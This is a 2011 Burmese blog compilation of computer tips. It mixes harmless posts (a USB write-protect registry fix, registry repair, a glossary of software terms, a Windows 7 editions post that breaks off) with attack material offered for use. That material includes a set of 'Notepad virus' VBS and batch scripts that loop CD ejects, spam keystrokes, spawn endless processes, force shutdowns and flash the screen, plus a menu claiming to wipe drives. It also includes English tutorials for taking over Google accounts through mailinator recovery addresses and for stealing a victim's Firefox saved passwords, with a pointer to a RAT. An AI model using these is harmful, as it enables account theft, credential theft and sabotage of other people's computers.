Thursday 20 October 2011

USB Memory Stick ထဲက ဖိုင္ေတြကို ဖ်က္မရ၊ ေကာ္ပီ လုပ္မရဘူးဆိုရင္...

ကြန္ပ်ဴတာထဲကို ဗိုင္းရပ္စ္ေတြ ကိုက္သြားတဲ့အခါ။ ဒါမွမဟုတ္ ကိုယ့္ Memory Stick ကို အျခားစက္မွာ ထိုးမိၿပီး မိမိစက္ကို ျပန္ထိုးလိုက္တဲ့အခါ လွ်ိဳ႕၀ွက္ Script တစ္ခုက မိမိကြန္ပ်ဴတာထဲကို လွ်ိဳ႕၀ွက္ ၀င္ေရာက္သြားပါတယ္။ အဲဒီ Script က ဗိုင္းရပ္စ္လဲ မဟုတ္ျပန္ပါဘူး။ သူက Autorun ကေနတဆင့္ ၀င္ေရာက္သြားတာပါ။ ဘာဘဲျဖစ္ျဖစ္ အျခားေသာ အေၾကာင္းအမ်ိဳးမ်ိဳးေၾကာင့္ USB Memory Stick ထဲကဖိုင္ေတြကို ေကာ္ပီလုပ္မရ ဖ်က္မရေတာ့ဘဲ Write Protect ဆိုတဲ့ Error ျဖစ္ေပၚလာရပါတယ္။ အဲဒီလိုျဖစ္လာၿပီဆိုရင္ ဘာလုပ္လို႔ ဘာကိုင္ရမွန္း မသိေအာင္ ျဖစ္ရေတာ့တာပါဘဲ။ ကိုယ္တိုင္လဲ ၾကံဳခဲ့ရဘူး ပါတယ္။ ဒါေၾကာင့္ လြယ္လြယ္ကူကူနဲ႕ ေျဖရွင္းနည္းေလးကို ေရးျပေပးလိုက္ရပါတယ္။

HKEY_LOCAL_MACHINE>>System>>CurrentControlSet>>Control>>StorageDevicePolicies ထိေရာက္ေအာင္ အဆင့္ဆင့္သြားပါ။ ေရာက္ရင္ ညာဘက္အျခမ္းမွာ WriteProtect ဆိုတဲ့ အျပာေရာင္ ဖိုင္ေလးပထမဆံုး Start>Run(box) မွာ regedit လို႕ ရိုက္ထည့္ပါ။ Registry Editor ေပၚလာပါမယ္။ အဲဒီထဲမွာ တဖိုင္ကို ႏွစ္ခ်က္ကလစ္ၿပီးရင္ Value Data ‘1’ ဆိုတာကို ‘0’ လို႕ျပန္ေျပာင္းေပးလိုက္ပါ။ ၿပီးရင္ Registry Editor မွ အၿပီးထြက္ၿပီး ကြန္ပ်ဴတာကို Restart ခ်လိုက္ပါ။ ၿပီးရင္ ျပန္စမ္းၾကည့္ပါ။ Write Protect ဆိုတဲ့ Error မေပၚေတာ့ပါ/Memory Stick ပ်က္စီးေနၿပီဆိုရင္ေတာ့ အထက္ပါနည္းလဲ အသံုးမ၀င္ေတာ့ပါ။

အျပည့္အစံု

VIRUS ဖ်က္စီးမႈေၾကာင့္ ပ်က္ဆီးသြားေသာ regedit ကို ျပန္ယူမယ္

Flashy ဆိုတဲ့ ဗိုင္းရပ္နဲ႔ သူ႔အမ်ိဳးကြဲေတြရဲ႕ ေနာက္ဆက္တြဲ ျပႆနာေတြကို ရွင္းေပးႏိုင္တဲ့ removal tool ေလးပါ။ မ်ားစြာ အသံုး၀င္ပါတယ္။ ၿပီးေတာ့ က်ေနာ္သိသေလာက္ သူနဲ႔ပက္သက္တဲ့ ပာာေတြကို ရွင္းခဲ့ပါတယ္။
(၁) Folder Option ကို ျပန္လည္ေဖာ္ဖို႔ဆိုရင္ေတာ့...
HKEY_CURRENT_USER \Software \Microsoft \Windows \CurrentVersion \Policies \Explorer

"NoFolder Options"="1" ျဖစ္ေနရင္ ဖ်က္ပါ ။

(၂) File extension မ်ား ေပ်ာက္ေနတာနဲ႔ Hidden ျဖစ္ေနတယ္ဆိုရင္ေတာ့....

HKEY_CURRENT_USER \Software \Microsoft \Windows \CurrentVersion \Policies \Explorer \Advanced

"HideFile Ext"="1" ႏွင့္ "Hidden"="2" ဟူေသာ စာသား မ်ားကို ဖ်က္ပါ။

(၃) Computer မွာ regedit ကို ေခၚလို႔ မရေတာ့ဘူးဆိုရင္ေတာ့....

Signature="$Chicago$" Provider=Symantec

[DefaultInstall] AddReg=UnhookRegKey

[UnhookRegKey] HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*" HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*" HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*" HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*" HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe ""%1""" HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*" HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools,0x00000020,0

အထက္မွာ ေဖာ္ျပထားတဲ့ ကုဒ္ေတြကို notepad နဲ႔ကူးၿပီး unhook.bat လုပ္ၿပီး run လိုက္ပါ။
regedit ကို ျပန္ေခၚလို႔ ရပါလိမ့္မယ္။

အျပည့္အစံု

Notepad ႏွင့္ေရးထားေသာ Virusမ်ား

1)သင့္ CD Drive ကိုဆက္တိုက္ပြင့္ေနပါလိမ့္မယ္။ဖြင့္လိုက္ပိတ္လိုက္ေပါ့။
code:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

ဒီဟာေလးကို ( .vbs) နဲ႔ေဆ့ပါ

2) Caps Lock ကိုဆက္တိုက္ဖြင့္လိုက္ပိတ္လိုက္လုပ္ေနပါလိမ့္မယ္။
code:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

ဒီဟာေလးကို ( .vbs) နဲ႔ေဆ့ပါ

3) ဒါေလးကသင့္ကြန္ျပဴတာကို မက္ေဆ့ ေပးျပီး shutdown က်သြားေစပါတယ္။
code :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

ဒီဟာေလးကို ( .bat) နဲ႔ေဆ့ပါ

4) Enter key ကိုဆက္တိုက္ႏွိပ္ေနမွာပါ။
code :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

ဒီဟာေလးကို ( .vbs) နဲ႔ေဆ့ပါ.

5) CMD နဲ႕ Notepad ေတြရပ္မရေအာင္ဆက္တိုက္ဖြင့္တာေလးပါ။ဒါေလးကနဲနဲေလးဆိုးတယ္။
code:
@echo off
:A
start cmd
start notepad
goto :A


ဒီဟာေလးကို ( .bat) နဲ႔ေဆ့ပါ..

6) Backspace တိုက္ပြင့္ေနမွာပါ။သင္စာရိုက္လို႕မရပါ။
code :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

ဒီဟာေလးကို ( .vbs) နဲ႔ေဆ့ပါ

7) သင့္ keyboard ေလးကိုဟက္ျပီး သင္ဟာအရူးဆိုျပီးသင္စာရိုက္တိုင္းေပၚေနမွာပါ။
code:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

ဒီဟာေလးကို ( .vbs) နဲ႔ေဆ့ပါ

8. Notepad ကိုဆက္တိုက္ပြင့္ေနမွာပါ။
code:

@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top
ဒီဟာေလးကို ( .bat) နဲ႔ေဆ့ပါ

9) ေအာက္ကျဖစ္စဥ္ေတြကိုလုပ္ေပးမယ့္ program ေလးပါ။ေပးလာမယ့္ မက္ေဆ့ေတြကကၽြန္ေတာ္ထင္ သလိုေရွာက္ေရးထားတာပါ။

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
code:

@echo off
title The end of the world
cd C:
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

ဒီဟာေလးကို ( .bat) နဲ႔ေဆ့ပါ


10) Lighting .bat

သင့္ ေမာ္နီတာဟာဘာမွ မျမင္ရပဲ လင္းလက္ေနတဲ့ ဖန္သားျပင္ကိုသာျမင္ရမွာပါ။

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>z.dbg
echo g=100>>z.dbg
echo q>>z.dbg
debug nul
del z.dbg

သင္ျပန္ထြက္ခ်င္ရင္ CTRL-ALT-DELETE နဲ႕ျပန္ထြက္လိုက္ပါ။
ေအာက္ကကုတ္ဆိုရင္ အဲဒါနဲ႕မရပါ။ctrl+shirt+esc နဲံ႕ရမယ္။
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>z.dbg
echo g=100>>z.dbg
echo q>>z.dbg
debug nul
del z.dbg
goto a

အျပည့္အစံု

ware အသံုးအႏႈန္းမ်ား

Hardware

Hardware ဆုိတဲ့ အသုံးအႏႈန္းကုိ အိမ္ေဆာက္ပစၥည္းကိရိယာေတြ ေရာင္းတဲ့ဆုိင္မွာ အိမ္ေဆာက္ပစၥည္း ကိရိယာေတြကုိ ရည္းညႊန္းေျပာဆုိတဲ့အခါမွာ သုံးတာေတြ႕မိပါတယ္။ ကြန္ျပဴတာမွာေတာ့ Hardware ဆုိတာ ထိႏုိင္၊ ကုိင္ႏုိင္တဲ့ ပစၥည္းေတြဟာ Hardware ေတြပဲျဖစ္ပါတယ္။ Printer, System unit, Monitor, Keyboard, Mouse, Power Supply unit စတာေတြကုိ hardware ေတြလုိ႕ၿခံဳၿပီး ေခၚေ၀ၚပါတယ္။ ကြန္ျပဴတာ ျပင္ဆင္ေပးတဲ့သူေတြကုိ hardware technician, hardware engineer လုိ႕ေခၚပါတယ္။ အဲဒီလုိျပင္ဆင္ႏုိင္ေအာင္ သင္ၾကားေပးတဲ့ သင္တန္းမ်ိဳးကုိ hardware training center စသျဖင့္ သုံးတာမ်ိဳးလည္း႐ွိပါတယ္။

Software

Software ဆုိတာကေတာ့ လုပ္ေဆာင္ခ်က္ၿပီးေျမာက္ေအာင္ လုပ္ေဆာင္ေပးႏုိင္တဲ့ Program၊ ခုိင္းေစညႊန္ၾကားခ်က္ေတြစုစည္းထားတာကုိ ေခၚပါတယ္။ Operating System, Application ေတြဟာ Software ေတြျဖစ္ပါတယ္။ Software ရဲ႕အဓိက အပုိင္းႏွစ္ပုိင္းလုိ႕ေျပာ ႏုိင္ၿပီး Operating System က ကြန္ျပဴတာ အလုပ္လုပ္ေအာင္နဲ႕ Program ေတြ၊ Application ေတြ ေကာင္းေကာင္းမြန္မြန္ တြဲဖက္လုပ္ေဆာင္ႏုိင္ေအာင္ ထိန္းေက်ာင္းေပးပါတယ္။ အဲဒီလုိ လုပ္ေဆာင္ေပးတဲ့ Software ကုိ System Software လုိ႕လည္းေခၚပါတယ္။

Application Software ဆုိတာကေတာ့ လုပ္ငန္းေဆာင္တာတစ္ခုခုကုိ ၿပီးေျမာက္ေအာင္ လုပ္ေဆာင္ေပးပါတယ္။ ဥပမာ ေျပာရရင္ စာစီစာ႐ုိက္တဲ့ Word processing software, စာရင္းဇယားေတြ တြက္ခ်က္ဖုိ႕ Spreadsheet software, အင္ဂ်င္နီယာပုံေတြေရးဆြဲဖုိ႕ AutoCAD စတာေတြျဖစ္ပါတယ္။

တျခား Software ေတြကေတာ့ ကြန္ရက္ခ်ိတ္ဆက္မႈဆုိင္ရာလုပ္ငန္းအတြက္ Network Software ျဖစ္ၿပီး Language Software ကေတာ့ Program ေတြ ေရးသားရာမွာ သုံးစြဲတဲ့ Software ျဖစ္ပါတယ္။ တျခားအမ်ိဳးအစားေတြ လည္း႐ွိပါေသးတယ္။

Software နဲ႕ ဆက္စပ္သုံးစြဲေလ့႐ွိတဲ့ အသုံးေတြကေတာ့ Software ေရးသားတဲ့ အင္ဂ်င္နီယာေတြကုိ Software Engineer, Software ေရးသားတဲ့ အဖြဲ႕အစည္းကုိ Software house, Software ေတြေရးသား ဒီဇုိင္းလုပ္တဲ့သူေတြကုိ Software Developer, Software ေတြစုစည္းၿပီး သင့္ေတာ္ရာ Program ေတြကုိ စုစည္းေရာင္းခ်တာမ်ိဳးကုိ Software Package, Software suit ဆုိတာမ်ိဳးလည္းသုံးပါတယ္။ Software ေတြကုိ တရားမ၀င္ ကူးယူတာမ်ိဳးကုိ Software နဲ႕ ပင္လယ္ဓားျပ Pirate တြဲသုံးၿပီး Software pirate or Software pravicy လုိ႕ေရးသားသုံးႏႈန္းပါတယ္။

Firmware

Software ရဲ႕ လုပ္ငန္းစဥ္ေတြကုိ hardware ျဖစ္တဲ့ Read Only Memory (ROM) ထဲမွာ ထည့္သြင္းတာမ်ိဳးကုိ Firmware လုိ႕ေခၚပါတယ္။ RAM (Random Access Memory) နဲ႕မတူတဲ့ အခ်က္က ROM ေတြဟာ မီးပိတ္ခဲ့ရင္၊ ပါ၀ါျပတ္ေတာက္သြားခဲ့ရင္ သူ႕ထဲက အခ်က္အလက္ေတြ ေပ်ာက္ဆုံးသြားတာမ်ိဳး မျဖစ္ေအာင္ လုပ္ထားေပးပါတယ္။ ကြန္ျပဴတာတစ္လုံးရဲ႕ စတင္လုပ္ ေဆာင္ရမယ့္ လုပ္ငန္းစဥ္ေတြနဲ႕ Low Level input/output instruction ေတြကုိ Frimware ထဲမွာ ထည့္သိမ္းထားပါတယ္။ ကြန္ျပဴတာမွာ BIOS (Basic Input/ Output System)လုိ႕ ေခၚတဲ့ ပစၥည္းေလးဟာ Firmware ျဖစ္ပါတယ္။ CD ROM, DVD ROM, DVD Writer, CD Writer ေတြမွာလည္း Firmware ထည့္သြင္းထားေလ့႐ွိၿပီး အဲဒီ Firmware ကုိျပဳျပင္ေျပာင္းလဲမႈေတြ လုပ္ဖုိ႕လုိအပ္လုိ႕ Update လုပ္တာမ်ိဳးကုိ Firmware update လုိ႕သုံးၿပီး၊ Frimware ရဲ႕ model အနိမ့္အျမင့္ကုိ သိ႐ွိေအာင္ တစ္နည္းအားျဖင့္ Version အနိမ့္အျမင့္ကုိ သိ႐ွိေအာင္ နံပါတ္ေတြနဲ႕ ေဖာ္ျပထားေလ့႐ွိပါတယ္။

Hard dirive ေတြမွာလည္း Firmware ပါေလ့႐ွိၿပီး Version ဘယ္ေလာက္လဲဆုိတာ ေရးသားထားေလ့႐ွိပါတယ္။ Hard drive ေတြရဲ႕ Firmware ကုိ Update လုပ္တာ မႀကံဳဖူးေပမယ့္ CD, DVD ေတြ Writer ကုိေတာ့ Firmware update လုပ္ဖုိ႕လုိတာ သတိျပဳမိပါတယ္။

သတိျပဳရမွာတစ္ခုက ကြန္ျပဴတာ System မွာ သုံးထားတဲ့ Firware ျဖစ္တဲ့ BIOS ကုိ Update လုပ္တာကုိ Firmware update လုိ႕ သုံးေလ့မ႐ွိပဲ Bio update လုိ႕ပဲ ေခၚေ၀ၚသုံးစြဲေလ့႐ွိ ပါတယ္။

Freeware

Internet ဒါမွမဟုတ္ user group တစ္ခုခု ကေန အခမဲ့ သုံးစြဲခြင့္ျပဳ ကြန္ျပဴတာ Program ေတြကုိ Free ware လုိ႕သုံးပါတယ္။ အဲဒီ Program ေရးသားသူေတြေပၚမူတည္ၿပီး တစ္ဆင့္ျဖန္႕ခ်ိတာမ်ိဳးကုိေတာ့ လုပ္ခြင့္ေပးေလ့မ႐ွိသလုိ ထပ္မံေရာင္းခ်ပုိင္ခြင့္မျပဳတာမ်ိဳး ႐ွိပါတယ္။

Shareware

Shareware ေတြကေတာ့ စမ္းသပ္သုံးစြဲခြင့္ ကာလတစ္ခု သတ္မွတ္ထားၿပီး အဲဒီကာလ ေက်ာ္လြန္သြားလုိ႕၊ အသုံးျပဳတဲ့ သူကဆက္ၿပီး သုံးစြဲခ်င္တယ္ဆုိရင္ Software ေရးသားသူကုိ သတ္မွတ္ထားတဲ့ အခေၾကးေငြေပးတဲ့ Software အမ်ိဳးအစားျဖစ္ပါတယ္။ အမ်ားအားျဖင့္ Program အေသးေလးေတြ ျဖစ္ၿပီး အင္တာနက္ကေန Download လုပ္ရယူေလ့႐ွိပါတယ္။

Shelfware

အသုံးသိပ္မတြင္ေပမယ့္ ေတြ႕မိတတ္ပါတယ္။ မေရာင္းရဘဲ လက္ကီအေရာင္းဆုိင္ရဲ႕ အေရာင္းစင္ေပၚမွာ အခ်ိန္ၾကာျမင့္စြာ ႐ွိေနတဲ့ Software သို႕မဟုတ္ အသုံးမျပဳဘဲ ထားတာ ကာလၾကာျမင့္ၿပီျဖစ္တဲ့ Software ေတြကုိ သုံးစြဲေခၚေ၀ၚေလ့႐ွိပါတယ္။

Spyware

Spyware ဆုိတာကေတာ့ အင္တာနက္ ဆက္သြယ္ရာမွာ ကြန္ျပဴတာသုံးစြဲသူရဲ႕ ခြင့္ျပဳခ်က္ရယူျခင္းမ႐ွိဘဲ အဲဒီလူရ႕ဲ အခ်က္အလက္ေတြကုိ ရယူတဲ့ Software သုိ႕မဟုတ္ Hardware ကုိေခၚပါတယ္။ သတင္းအခ်က္အလက္ နည္းပညာေခတ္ႀကီးထဲမွာ အဓိကအဟန္႕ အတား အေႏွာင့္အယွက္ ျဖစ္ေစတာ Spyware ေတြျဖစ္ပါတယ္။

အင္တာနက္ၾကည့္႐ႈရာမွာ အခမဲ့ရ႐ွိႏုိင္တဲ့ Program ေတြကုိ Download လုပ္ရယူရင္းနဲ႔ Spyware ေတြပါ တြဲပါလာတာမ်ိဳး၊ ဗီဒီယုိေတြ၊ ပုံေတြကုိ download လုပ္ခြင့္ျပဳထားတဲ့ site ေတြကုိ ဆက္သြယ္ download လုပ္တဲ့အခါမ်ိဳးမွာ Virus ေတြ၊ Spyware ေတြပါ ပါေလ့႐ွိပါတယ္။

Spyware ေတြဟာ အသုံးျပဳတဲ့သူ User ရဲ႕ ျပဳမႈလုပ္ကုိင္ပုံ အမူအက်င့္ေတြကုိ ေစာင့္ၾကည့္ေနတာမ်ိဳး၊ ကုိယ္ေရးကိုယ္တာအခ်က္အလက္ေတြ ခုိးယူတာမ်ိဳးအျပင္ Software ေတြ Install လုပ္တာ၊ Web Browser ကုိလမ္းေၾကာင္းေျပာင္းပစ္တာမ်ိဳးလည္း လုပ္ေဆာင္ေလ့႐ွိပါတယ္။ မ်ားေသာအျဖင့္ Personal Computer ေတြနဲ႕ Microsoft Windows သုံး Desktop Computer ေတြမွာ ကူးစက္ခံရေလ့႐ွိပါတယ္။

Adware

ဗန္းစကားအေနနဲ႕ သုံးတာပါ။ Software ကုိ အခမဲ့ သုံးစြဲခြင့္ရေပမယ့္ Sponsor လုပ္တဲ့သူရဲ႕ ေၾကာ္ျငာပါ တြဲထည့္ေပးထားၿပီး အဲဒီ Program ကုိ Run လုိက္တဲ့အခ်ိန္မွာ ေၾကာ္ျငာေပၚလာတာမိ်ဳး ျဖစ္ေအာင္လုပ္ထားပါတယ္။ Software ေရးသားသူဟာ Software ထဲမွာ ေၾကာ္ျငာထည့္သြင္းထားတဲ့အတြက္ သူရဲ႕ထုတ္လုပ္မႈကုန္က်စရိတ္ ကာမိေအာင္လုပ္ထား တာျဖစ္ၿပီး၊ မ်ားေသာအားျဖင့္ Program ရဲ႕ ထိပ္ပုိင္းေခါင္းစည္းေနရာမွာ၊ ဒါမွမဟုတ္ ေအာက္ေျခဘက္မွာ ေၾကာ္ျငာေပၚေနတာမိ်ဳး လုပ္ထားပါတယ္။ Adware ေတြဟာလည္း Internet Online ဆက္သြယ္မႈနဲ႕ဆက္စပ္မႈ႐ွိေနၿပီး၊ အသုံးျပဳတဲ့ သူရဲ႕စိတ္၀င္စားမႈ၊ ၀င္ေရာက္ၾကည့္႐ႈတဲ့ site အေျခအေနေပၚမူတည္ၿပီး ဆက္စပ္မႈ႐ွိတဲ့ ေၾကာ္ျငာေတြကုိ ေၾကာ္ျငာတာျဖစ္ပါတယ္။ Program ေရးသားသူ ေတာ္ေတာ္မ်ားမ်ားက အခေၾကးေငြအနည္းငယ္ ေပးခဲ့ရင္ စိတ္အေႏွာက္အယွက္ျဖစ္ေစတဲ့ ေၾကာ္ျငာေတြကုိ ဖယ္႐ွားေပးေလ့႐ွိပါတယ္။ တစ္နည္းအားျဖင့္ေတာ့ ေၾကာ္ျငာမထည့္ေစခ်င္ရင္ ပုိက္ဆံနည္းနည္းေပးဖုိ႕လုိပါတယ္။ တခ်ိဳ႕ေၾကာ္ျငာေတြကေတာ့ ဘယ္ကမွန္းမသိ၊ ဘယ္အခ်ိန္ကထည့္သြင္းလုိက္မွန္းမသိဘဲ သင့္ကြန္ျပဴတာရဲ႕ Cookies and Registry key ေတြမွာ ၀င္ေရးသြားတာမ်ိဳးလည္း႐ွိပါတယ္။ အဲဒီလုိ Program မ်ိဳးကုိ ဖယ္႐ွားခ်င္ရင္ Lavasoft ရဲ႕ Adware Program မ်ိဳးကုိ သုံးစြဲၿပီးဖယ္႐ွား ကာကြယ္ထားဖုိ႕လုိပါတယ္။

Bridgeware
မတူညီတဲ့ ကြန္ျပဴတာႏွစ္လုံးရဲ႕ Application ဒါမွမဟုတ္ Data file ေတြကုိ Convert လုပ္ေျပာင္းလဲေပးတဲ့ Hardware or Software ကို Bridgeware လုိ႕ေခၚပါတယ္။

Malware

Malicious and Software စကားလုံးႏွစ္လုံးကုိေပါင္းၿပီး အတုိေကာက္ Maleware လုိ႕သုံးထားတာျဖစ္ပါတယ္။ သူတစ္ပါးကုိ မနာလုိ၀န္တုိျဖစ္ၿပီး မလုိတမာစိတ္နဲ႕ပ်က္စီးရာ ပ်က္စီးေၾကာင္း ႀကံစည္ေရးသားထားတဲ့ Software ျဖစ္ပါတယ္။ ကြန္ျပဴတာသုံးစြဲသူအေနနဲ႔ Malware ေတြကြန္ျပဴတာထဲ ၀င္ေရာက္တာကုိ ဘာမွသိလုိက္မွာမဟုတ္ဘဲ ၀င္ေရာက္ေႏွာင့္ယွက္ ဖ်က္ဆီးခံရမွ သိႏုိင္တာမ်ိဳးျဖစ္ႏုိင္ပါတယ္။ Malware ေတြကုိ Badware လုိ႕လည္း ေခၚေ၀ၚသုံးစြဲေလ့႐ွိပါတယ္။ ဖန္တီးေရးသားသူေပၚ မူတည္ၿပီး ပ်က္စီးခၽြတ္ယြင္းမႈအမ်ိဳးမ်ိဳး ျဖစ္ႏုိင္သလုိ၊ Worm, Trojan horses spyware, adware ေတြတြဲ ထည့္ေပးထားမ်ိဳးလည္းျဖစ္ႏုိင္ ပါတယ္။

အျပည့္အစံု

How to hack Youtube, Gmail, Orkut account

Mailinator.com is temporary inbox provider. Temporary mail box provider allows you to access your inbox without putting any password for your @mailinator email inbox. No registration, no password. This can really help us to hack Youtube, Gmail and Orkut accounts. Many of the netizens use @mailinator.com email addresses as their recovery mail addresses. Thus, we can easily hack such Google accounts.

I will illustrate this hack using mail id: hotmail@mailinator.com

1. Go to Google Password Recovery page and enter hotmail@mailinator.com and hit on Submit.
Note: You can enter any mail id. Just use this format: ---@mailinator.com
Use popular names or email addresses as it increases chances victim using the same id as recovery email id.

Hacking Google accounts

2. Now, enter captcha and Google will send Password Reset mail at hotmail@mailinator.com

3. Go to mailinator.com and just enter hotmail@mailinator.com in "Check your inbox" field. Hit on "Go". You will be able to access inbox. Open Google's mail to see password reset link:

Password reset mail from Google

4. Click on it and change the password of the Google account to the one you desire.

How to hack Youtube, Gmail, orkut account password

The whole Google account and also the Google services like Gmail, Youtube, Orkut which are linked to that account are yours. Thus, you are able to hack Youtube, Gmail, orkut account password using this Mailinator hack.

How to hack email account password

Note: To prevent yourself from losing this hacked account, go to "Change password recovery options" and add a valid email address.

That's it friends. I hope you will be able to hack Youtube, Gmail or Orkut account using this hack. There are plenty of Google accounts available which can be hacked using this hack. If you have any problem in this tutorial to hack Youtube, Gmail, orkut account password, please mention it in comments.

Enjoy n hack youtube, gmail n orkut account password...

အျပည့္အစံု

Hack Email accounts using Firefox

Things which are necessary for this hack to be successfull:
1. Physical access to victim machine (if you don't have, use Cybergate RAT).
2. Victim's passwords saved in victim's Firefox.

Usually, whenever passwords are stored in Firefox, they can be easily seen by going to Tools -> Options ->Security and hitting on Saved Passwords.

But, if the victim if shrewd enough to use Master Password, on hitting Saved Passwords, you are prompted to enter Master Password. Master Password thus protects victim's password from being seen by any stranger and you are unable to hack his Email passwords which are stored in Firefox browser.

How to hack email accounts

This article shows you how to bypass Master Password of victim Firefox. So, follow the steps below to hack his Email account password, even if Master Password is in role.

Steps to hack Email Account:


Let us assume that victim uses Vista Operating system and you(hacker) are using Windows XP.

1. On victim computer, go to:
For Windows Vista:
C:\Users\RAJ\AppData\Roaming\Mozilla\Firefox\Profiles\iosjcyzp.default
For Windows XP:
C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\tez96yyu.default

Replace RAJ and Administrator with your victim's computer username.
and copy "signons.sqlite" file to your pen drive or any removable drive.

Stored password hack email

Note: If you are unable to find "signons.sqlite", simply go to C drive and search for "signons.sqlite". You will get it for sure.

2. Now, come back to your computer and paste this "signons.sqlite" in your Firefox by using the path in Step 1.

Firefox hack copy signons.sqlite file

3. After you've pasted "signons.sqlite" file in your firefox, open Firefox browser.

4. Go to Tools -> Options -> Security tab. Hit on "Show password" and this time, you will be able to see victim mail accounts in popup box. Hit on "Show password" again and you will be able to see his hacked email account passwords. Now, you don't have to enter any Master password.

Hacked Email passwords using Firefox

What is Logic behind this Firefox hack???


Firefox stores all the remembered passwords in two files:
1. Signons.sqlite and
2. Key3

Signons.sqlite is used to store all online username and passwords in encrypted form while Key3 file stores information about Master Password. So, in this hack, we are stealing victim's Signons.sqlite file (and not Key3) and opening it in our Firefox. Naturally, our Firefox shows victim's password and thus, we are able to hack email acccount passwords.

Really, this is one of the most vulnerable aspects of Firefox. Infact, Firefox stealers use this same logic for stealing Firefox saved passwords and thus to hack email accounts of victim. I have tried my best to keep this tutorial simple. If you have any problem in this Firefox hack to hack Email accounts of the victim, please mention it in comments.

Enjoy n hack Email accounts using Firefox...

အျပည့္အစံု

Windows 7 အေၾကာင္း ေလ့လာမယ္

Windows 7 operation system ကို edition အမ်ိဳးမ်ိဳးနဲ႔ ေတြ႕ႏိုင္ပါတယ္။ကိုယ္လိုအပ္မဲ႔အေနအထား ကိုယ္သံုးမဲ႔ေငြပမာဏေပၚမူတည္ၿပီး အမ်ိဳးမ်ိဳးေရြးခ်ယ္ႏိုင္တာေပါ႔ Windows 7 edition အမ်ိဳးမ်ိဳးေပၚ မူတည္ၿပီး ကြဲၿပားတဲ႔ Feature ေတြ Function ေတြ ေတြ႕ရမွာပါ။ Windows 7 အမ်ိဳးအစား ၆မ်ိဳးရွိပါတယ္။

- - Windows 7 Starter
- - Windows 7 Home Basic
- - Windows 7 Home Premium
- - Windows 7 Professional
- - Windows 7 Enterprise
- - Windows 7 Ultimate စတာေတြပဲ ၿဖစ္ပါတယ္။

Windows XP မွာတုန္းကေတာ႔ … XP
Prefessional & Home Edition ႏွစ္မ်ိဳးကိုပဲ အမ်ားအားၿဖင္႔ေတြ႕ရပါတယ္။
သို႔ေသာ္ XP မွာလဲ Starter version ရွိပါတယ္။ ဒါ႔အၿပင္ Media Center
Edition နဲ႔ Tablet Edition ေတြပါရွိပါတယ္။
- - Windows XP Starter
- - Windows XP Home Edition
- - Windows XP Professional Edition
- - Windows XP Media Center Edition
- - Windows XP Tablet Edition ေတြဆိုၿပီးရွိပါတယ္။



Windows 7 Starter
Windows 7 Starter ကို အသံုးၿပဳတာအရမ္းနည္းပါတယ္။ လက္လီအေရာင္းတစ္ခ်ိဳ႕နဲ႔ ကြန္ၿပဴတာထုတ္လုပ္သူတစ္ခ်ိဳ႕က ကြန္ၿပဴတာအသစ္ထဲမွာ တစ္ခါတည္းထည္႔ေပးလိုက္တဲ႔ အခါမ်ိဳးေတြမွာ ေတြ႕ရတတ္ပါတယ္။ ဒီ version မွာ Aero user interface, DVD playback, Windows Media Center, Internet connection sharing ေတြမရႏိုင္ပါဘူး။
Domain system ကိုလဲ ဒီ version သံုးထားရင္ join ႏိုင္မွာမဟုတ္ပါဘူး။
Enterprise Feature ေတြၿဖစ္တဲ႔ …
Encryption File System (EFS), AppLocker, DirectAccess, BitLocker, Remote
Desktop Host, BranchCache စတာေတြလဲမရႏိုင္ပါဘူး။
ေနာက္ … အသံုး၀င္တဲ႔ IIS Web Server ကိုလဲ သံုးလို႔ရမွာ မဟုတ္ပါဘူး။ ( Windows XP မွာလဲ IIS ပါပါတယ္။
မ်ားေသာအားၿဖင္႔ေတာ႔ IIS သံုးခ်င္ရင္ Windows Server versions ေတြမွာပဲ
သံုးတာမ်ားပါတယ္။ Windows 7 မွာလဲ IIS ကိုတစ္ခါတည္းထည္႔ေပးထားပါတယ္။ Web
